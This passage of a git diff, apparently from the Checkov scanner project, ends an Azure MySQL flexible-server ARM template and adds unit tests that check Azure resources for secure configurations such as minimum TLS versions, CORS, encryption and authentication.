"http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules", + "name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]", + "apiVersion": "[parameters('firewallRulesAPIVersion')]", + "properties": { + "StartIpAddress": "[variables('firewallRules')[copyIndex()].startIPAddress]", + "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]" + } + } + ] + } + } + }, + { + "condition": "[parameters('aadEnabled')]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('addAdmins-', parameters('guid'))]", + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/administrators", + "name": "[concat(parameters('serverName'),'/ActiveDirectory')]", + "apiVersion": "[variables('api')]", + "properties": { + "administratorType": "[parameters('aadData').administratorType]", + "identityResourceId": "[parameters('aadData').identityResourceId]", + "login": "[parameters('aadData').login]", + "sid": "[parameters('aadData').sid]", + "tenantId": "[parameters('aadData').tenantId]" + } + } + ] + } + } + }, + { + "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "copy": { + "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]", + "mode": "serial", + "name": "serverParametersIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]", + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/configurations", + "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]", + "apiVersion": "[variables('api')]", + "properties": { + "value": "[variables('serverParameters')[copyIndex()].value]", + "source": "[variables('serverParameters')[copyIndex()].source]" + } + } + ] + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/test_AppGWDefinesSecureProtocols.py b/tests/arm/checks/resource/test_AppGWDefinesSecureProtocols.py new file mode 100644 index 00000000000..13edb50bf9d --- /dev/null +++ b/tests/arm/checks/resource/test_AppGWDefinesSecureProtocols.py @@ -0,0 +1,43 @@ +import os +import unittest +from checkov.runner_filter import RunnerFilter +from checkov.arm.runner import Runner +from checkov.arm.checks.resource.AppGWDefinesSecureProtocols import check + + +class TestAppGWDefinesSecureProtocols(unittest.TestCase): + + def test(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + test_files_dir = os.path.join(current_dir, "example_AppGWDefinesSecureProtocols") + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + passing_resources = { + 'Microsoft.Network/applicationGateways.with_protocolversion_and_cipher_pass', + 'Microsoft.Network/applicationGateways.with_policyName_pass1' + } + failing_resources = { + 'Microsoft.Network/applicationGateways.without_sslPolicy_fail', + 'Microsoft.Network/applicationGateways.empty_sslPolicy_fail1', + 'Microsoft.Network/applicationGateways.with_protocolversion_and_cipher_fail2', + 'Microsoft.Network/applicationGateways.with_policyName_fail3', + } + skipped_resources = {} + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + + self.assertEqual(summary['passed'], len(passing_resources)) + self.assertEqual(summary['failed'], len(failing_resources)) + self.assertEqual(summary['skipped'], len(skipped_resources)) + self.assertEqual(summary['parsing_errors'], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == '__main__': + unittest.main() diff --git a/tests/arm/checks/resource/test_AppServiceDisallowCORS.py b/tests/arm/checks/resource/test_AppServiceDisallowCORS.py new file mode 100644 index 00000000000..6de73058d88 --- /dev/null +++ b/tests/arm/checks/resource/test_AppServiceDisallowCORS.py @@ -0,0 +1,38 @@ +import unittest +from pathlib import Path + +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter +from checkov.arm.checks.resource.AppServiceDisallowCORS import check + + +class TestAPPServiceDisallowCORS(unittest.TestCase): + + def test_summary(self): + # given + test_files_dir = Path(__file__).parent / "example_AppServiceDisallowCORS" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.Web/sites.pass", + + } + failing_resources = { + "Microsoft.Web/sites.fail", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) diff --git a/tests/arm/checks/resource/test_AppServiceIdentityProviderEnabled.py b/tests/arm/checks/resource/test_AppServiceIdentityProviderEnabled.py new file mode 100644 index 00000000000..050e63e593d --- /dev/null +++ b/tests/arm/checks/resource/test_AppServiceIdentityProviderEnabled.py @@ -0,0 +1,39 @@ +import os +import unittest + +from checkov.runner_filter import RunnerFilter +from checkov.arm.runner import Runner +from checkov.arm.checks.resource.AppServiceIdentityProviderEnabled import check + + +class TestAppServiceIdentityProviderEnabled(unittest.TestCase): + + def test(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = os.path.join(current_dir, "example_AppServiceIdentityProviderEnabled") + report = runner.run(root_folder=test_files_dir,runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + passing_resources = { + "Microsoft.Web/sites.pass", + } + failing_resources = { + "Microsoft.Web/sites.fail", + } + + + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + diff --git a/tests/arm/checks/resource/test_AppServiceJavaVersion.py b/tests/arm/checks/resource/test_AppServiceJavaVersion.py new file mode 100644 index 00000000000..a554d699363 --- /dev/null +++ b/tests/arm/checks/resource/test_AppServiceJavaVersion.py @@ -0,0 +1,41 @@ +import os +import unittest + +from checkov.runner_filter import RunnerFilter +from checkov.arm.runner import Runner +from checkov.arm.checks.resource.AppServiceJavaVersion import check + + +class TestAppServiceJavaVersion(unittest.TestCase): + + def test(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = os.path.join(current_dir, "example_AppServiceJavaVersion") + report = runner.run(root_folder=test_files_dir, + runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + passing_resources = { + 'Microsoft.Web/sites.pass', + } + failing_resources = { + 'Microsoft.Web/sites.fail', + } + skipped_resources = {} + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + self.assertEqual(summary['passed'], len(passing_resources)) + self.assertEqual(summary['failed'], len(failing_resources)) + self.assertEqual(summary['skipped'], len(skipped_resources)) + self.assertEqual(summary['parsing_errors'], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == '__main__': + unittest.main() diff --git a/tests/arm/checks/resource/test_AppServicePythonVersion.py b/tests/arm/checks/resource/test_AppServicePythonVersion.py new file mode 100644 index 00000000000..bb7219084ae --- /dev/null +++ b/tests/arm/checks/resource/test_AppServicePythonVersion.py @@ -0,0 +1,39 @@ +import unittest +from pathlib import Path + +from checkov.arm.checks.resource.AppServicePythonVersion import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestAppServicePythonVersion(unittest.TestCase): + + def test_summary(self): + # given + test_files_dir = Path(__file__).parent / "example_AppServicePythonVersion" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.Web/sites.pass", + + } + failing_resources = { + "Microsoft.Web/sites.fail", + "Microsoft.Web/sites.unknown", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) diff --git a/tests/arm/checks/resource/test_AppServiceRemoteDebuggingNotEnabled.py b/tests/arm/checks/resource/test_AppServiceRemoteDebuggingNotEnabled.py new file mode 100644 index 00000000000..adda9dccc97 --- /dev/null +++ b/tests/arm/checks/resource/test_AppServiceRemoteDebuggingNotEnabled.py @@ -0,0 +1,36 @@ +import os +import unittest +from checkov.runner_filter import RunnerFilter +from checkov.arm.runner import Runner +from checkov.arm.checks.resource.AppServiceRemoteDebuggingNotEnabled import check + + +class TestAppServiceRemoteDebuggingNotEnabled(unittest.TestCase): + + def test(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = os.path.join(current_dir, "example_AppServiceRemoteDebuggingNotEnabled") + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + passing_resources = { + "Microsoft.Web/sites.pass", + "Microsoft.Web/sites.pass1", + } + failing_resources = { + "Microsoft.Web/sites.fail", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + diff --git a/tests/arm/checks/resource/test_AutomationEncrypted.py b/tests/arm/checks/resource/test_AutomationEncrypted.py new file mode 100644 index 00000000000..31e3afc609a --- /dev/null +++ b/tests/arm/checks/resource/test_AutomationEncrypted.py @@ -0,0 +1,36 @@ +import os +import unittest + +from checkov.arm.checks.resource.AutomationEncrypted import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestAutomationEncrypted(unittest.TestCase): + def test_summary(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = current_dir + "/example_AutomationEncrypted" + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + passing_resources = { + "Microsoft.Automation/automationAccounts/variables.pass", + } + + failing_resources = { + "Microsoft.Automation/automationAccounts/variables.fail", + "Microsoft.Automation/automationAccounts/variables.fail1", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], 1) + self.assertEqual(summary["failed"], 2) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) diff --git a/tests/arm/checks/resource/test_AzureBatchAccountUsesKeyVaultEncryption.py b/tests/arm/checks/resource/test_AzureBatchAccountUsesKeyVaultEncryption.py new file mode 100644 index 00000000000..f788cd6b313 --- /dev/null +++ b/tests/arm/checks/resource/test_AzureBatchAccountUsesKeyVaultEncryption.py @@ -0,0 +1,39 @@ +import unittest +from pathlib import Path +from checkov.arm.checks.resource.AzureBatchAccountUsesKeyVaultEncryption import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestAzureBatchAccountUsesKeyVaultEncryption(unittest.TestCase): + def test_summary(self): + # given + test_files_dir = Path(__file__).parent / "example_AzureBatchAccountUsesKeyVaultEncryption" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.Batch/batchAccounts.pass", + } + failing_resources = { + "Microsoft.Batch/batchAccounts.fail", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/arm/checks/resource/test_AzureDefenderOnStorage.py b/tests/arm/checks/resource/test_AzureDefenderOnStorage.py new file mode 100644 index 00000000000..015826b2750 --- /dev/null +++ b/tests/arm/checks/resource/test_AzureDefenderOnStorage.py @@ -0,0 +1,33 @@ +import unittest +from checkov.arm.checks.resource.AzureDefenderOnStorage import check +from pathlib import Path +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestAzureDefenderOnStorage(unittest.TestCase): + def test_summary(self): + test_files_dir = Path(__file__).parent / "example_AzureDefenderOnStorage" + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + passing_resources = { + "Microsoft.Security/pricings.pass", + } + failing_resources = { + "Microsoft.Security/pricings.fail", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passed_check_resources, passing_resources) + self.assertEqual(failed_check_resources, failing_resources) + + +if __name__ == '__main__': + unittest.main() diff --git a/tests/arm/checks/resource/test_AzureMLWorkspacePrivateEndpoint.py b/tests/arm/checks/resource/test_AzureMLWorkspacePrivateEndpoint.py new file mode 100644 index 00000000000..63d1b7407d5 --- /dev/null +++ b/tests/arm/checks/resource/test_AzureMLWorkspacePrivateEndpoint.py @@ -0,0 +1,42 @@ +import unittest +from pathlib import Path + +from checkov.arm.checks.resource.AzureMLWorkspacePrivateEndpoint import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestAzureMLWorkspacePrivateEndpoint(unittest.TestCase): + def test_summary(self): + # given + test_files_dir = Path(__file__).parent / "example_AzureMLWorkspacePrivateEndpoint" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.MachineLearningServices/workspaces.pass1", + "Microsoft.MachineLearningServices/workspaces.pass2" + } + failing_resources = { + "Microsoft.MachineLearningServices/workspaces.fail1", + "Microsoft.MachineLearningServices/workspaces.fail2", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], 2) + self.assertEqual(summary["failed"], 2) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/arm/checks/resource/test_CognitiveServicesConfigureIdentity.py b/tests/arm/checks/resource/test_CognitiveServicesConfigureIdentity.py new file mode 100644 index 00000000000..c049788d9fb --- /dev/null +++ b/tests/arm/checks/resource/test_CognitiveServicesConfigureIdentity.py @@ -0,0 +1,40 @@ +import unittest +from pathlib import Path + +from checkov.arm.checks.resource.CognitiveServicesConfigureIdentity import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestCognitiveServicesConfigureIdentity(unittest.TestCase): + def test_summary(self): + # given + test_files_dir = Path(__file__).parent / "example_CognitiveServicesConfigureIdentity" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.CognitiveServices/accounts.pass", + } + failing_resources = { + "Microsoft.CognitiveServices/accounts.fail", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/arm/checks/resource/test_CognitiveServicesEnableLocalAuth.py b/tests/arm/checks/resource/test_CognitiveServicesEnableLocalAuth.py new file mode 100644 index 00000000000..9c47dca9a0e --- /dev/null +++ b/tests/arm/checks/resource/test_CognitiveServicesEnableLocalAuth.py @@ -0,0 +1,41 @@ +import unittest +from pathlib import Path + +from checkov.arm.checks.resource.CognitiveServicesEnableLocalAuth import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestCognitiveServicesEnableLocalAuth(unittest.TestCase): + def test_summary(self): + # given + test_files_dir = Path(__file__).parent / "example_CognitiveServicesEnableLocalAuth" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.CognitiveServices/accounts.pass", + } + failing_resources = { + "Microsoft.CognitiveServices/accounts.fail", + "Microsoft.CognitiveServices/accounts.fail2", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/arm/checks/resource/test_DataExplorerUsesDiskEncryption.py b/tests/arm/checks/resource/test_DataExplorerUsesDiskEncryption.py new file mode 100644 index 00000000000..fe6a51f5aff --- /dev/null +++ b/tests/arm/checks/resource/test_DataExplorerUsesDiskEncryption.py @@ -0,0 +1,39 @@ +import os +import unittest + +from checkov.runner_filter import RunnerFilter +from checkov.arm.checks.resource.DataExplorerUsesDiskEncryption import check +from checkov.arm.runner import Runner + + +class TestDataExplorerUsesDiskEncryption(unittest.TestCase): + def test(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + test_files_dir = current_dir + "/example_DataExplorerUsesDiskEncryption" + + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + passing_resources = { + "Microsoft.Kusto/clusters.pass", + } + failing_resources = { + "Microsoft.Kusto/clusters.fail", + + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/arm/checks/resource/test_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py b/tests/arm/checks/resource/test_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py new file mode 100644 index 00000000000..f760685abda --- /dev/null +++ b/tests/arm/checks/resource/test_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py @@ -0,0 +1,26 @@ +import os +import unittest + +from checkov.arm.checks.resource.DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestDatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey(unittest.TestCase): + + def test_summary(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = current_dir + "/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey" + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + self.assertEqual(summary['passed'], 1) + self.assertEqual(summary['failed'], 2) + self.assertEqual(summary['skipped'], 0) + self.assertEqual(summary['parsing_errors'], 0) + + +if __name__ == '__main__': + unittest.main() diff --git a/tests/arm/checks/resource/test_DatabricksWorkspaceDataPlaneToControlPlaneCommunicateOverPrivateLink.py b/tests/arm/checks/resource/test_DatabricksWorkspaceDataPlaneToControlPlaneCommunicateOverPrivateLink.py new file mode 100644 index 00000000000..09ec78eba45 --- /dev/null +++ b/tests/arm/checks/resource/test_DatabricksWorkspaceDataPlaneToControlPlaneCommunicateOverPrivateLink.py @@ -0,0 +1,26 @@ +import os +import unittest + +from checkov.arm.checks.resource.DatabricksWorkspaceIsNotPublic import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestDatabricksWorkspaceIsNotPublic(unittest.TestCase): + + def test_summary(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = current_dir + "/example_DatabricksWorkspaceIsNotPublic" + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + self.assertEqual(summary['passed'], 2) + self.assertEqual(summary['failed'], 2) + self.assertEqual(summary['skipped'], 0) + self.assertEqual(summary['parsing_errors'], 0) + + +if __name__ == '__main__': + unittest.main() diff --git a/tests/arm/checks/resource/test_FunctionAppDisallowCORS.py b/tests/arm/checks/resource/test_FunctionAppDisallowCORS.py new file mode 100644 index 00000000000..93127cb1f91 --- /dev/null +++ b/tests/arm/checks/resource/test_FunctionAppDisallowCORS.py @@ -0,0 +1,42 @@ +import unittest +from pathlib import Path + +from checkov.arm.checks.resource.FunctionAppDisallowCORS import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestFunctionAppDisallowCORS(unittest.TestCase): + + def test_summery(self): + # given + test_files_dir = Path(__file__).parent / "example_FunctionAppDisallowCORS" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.Web/sites.pass_with_cors", + "Microsoft.Web/sites.pass", + } + + failing_resources = { + "Microsoft.Web/sites.fail", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + +if __name__ == '__main__': + unittest.main() \ No newline at end of file diff --git a/tests/arm/checks/resource/test_FunctionAppHttpVersionLatest.py b/tests/arm/checks/resource/test_FunctionAppHttpVersionLatest.py new file mode 100644 index 00000000000..ae744f6845d --- /dev/null +++ b/tests/arm/checks/resource/test_FunctionAppHttpVersionLatest.py @@ -0,0 +1,38 @@ +import unittest +from pathlib import Path + +from checkov.arm.checks.resource.FunctionAppHttpVersionLatest import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestFunctionAppHttpVersionLatest(unittest.TestCase): + + def test_summary(self): + # given + test_files_dir = Path(__file__).parent / "example_FunctionAppHttpVersionLatest" + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.Web/sites/slots.pass", + "Microsoft.Web/sites.pass2", + + } + failing_resources = { + "Microsoft.Web/sites/slots.fail", + "Microsoft.Web/sites.fail2" + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) diff --git a/tests/arm/checks/resource/test_FunctionAppMinTLSVersion.py b/tests/arm/checks/resource/test_FunctionAppMinTLSVersion.py new file mode 100644 index 00000000000..8fb3007b04d --- /dev/null +++ b/tests/arm/checks/resource/test_FunctionAppMinTLSVersion.py @@ -0,0 +1,44 @@ +import unittest +from pathlib import Path + +from checkov.arm.checks.resource.FunctionAppMinTLSVersion import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestFunctionAppMinTLSVersion(unittest.TestCase): + def test_summary(self): + # given + test_files_dir = Path(__file__).parent / "example_FunctionAppMinTLSVersion" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.Web/sites.pass", + "Microsoft.Web/sites.pass2", + "Microsoft.Web/sites/slots.pass3", + "Microsoft.Web/sites/slots.pass4", + } + failing_resources = { + "Microsoft.Web/sites.fail", + "Microsoft.Web/sites/slots.fail2", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/arm/checks/resource/test_FunctionAppsEnableAuthentication.py b/tests/arm/checks/resource/test_FunctionAppsEnableAuthentication.py new file mode 100644 index 00000000000..ecb231dd73d --- /dev/null +++ b/tests/arm/checks/resource/test_FunctionAppsEnableAuthentication.py @@ -0,0 +1,38 @@ +import unittest +from pathlib import Path + +from checkov.arm.checks.resource.FunctionAppsEnableAuthentication import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestFunctionAppsEnableAuthentication(unittest.TestCase): + + def test_summary(self): + # given + test_files_dir = Path(__file__).parent / "example_FunctionAppsEnableAuthentication" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.Web/sites/config.pass", + } + failing_resources = { + "Microsoft.Web/sites/config.fail", + "Microsoft.Web/sites/config.fail2", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) \ No newline at end of file diff --git a/tests/arm/checks/resource/test_MSSQLServerMinTLSVersion.py b/tests/arm/checks/resource/test_MSSQLServerMinTLSVersion.py new file mode 100644 index 00000000000..724892efbf7 --- /dev/null +++ b/tests/arm/checks/resource/test_MSSQLServerMinTLSVersion.py @@ -0,0 +1,42 @@ +import unittest +from pathlib import Path + +from checkov.arm.checks.resource.MSSQLServerMinTLSVersion import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestMSSQLServerMinTLSVersion(unittest.TestCase): + + def test_summary(self): + # given + test_files_dir = Path(__file__).parent / "example_MSSQLServerMinTLSVersion" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.Sql/servers.pass" + } + + failing_resources = { + "Microsoft.Sql/servers.fail" + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertSetEqual(passing_resources, passed_check_resources) + self.assertSetEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/arm/checks/resource/test_MySQLPublicAccessDisabled.py b/tests/arm/checks/resource/test_MySQLPublicAccessDisabled.py new file mode 100644 index 00000000000..12bc369b81e --- /dev/null +++ b/tests/arm/checks/resource/test_MySQLPublicAccessDisabled.py @@ -0,0 +1,42 @@ +import os + +import unittest +from pathlib import Path + +from checkov.arm.checks.resource.MySQLPublicAccessDisabled import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestMySQLPublicAccessDisabled(unittest.TestCase): + + def test_summary(self): + # given + test_files_dir = Path(__file__).parent / "example_TestMySQLPublicAccessDisabled" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.DBforMySQL/servers.pass", + } + failing_resources = { + "Microsoft.DBforMySQL/servers.fail", + } + + passed_check_resources = {c.resource for c in 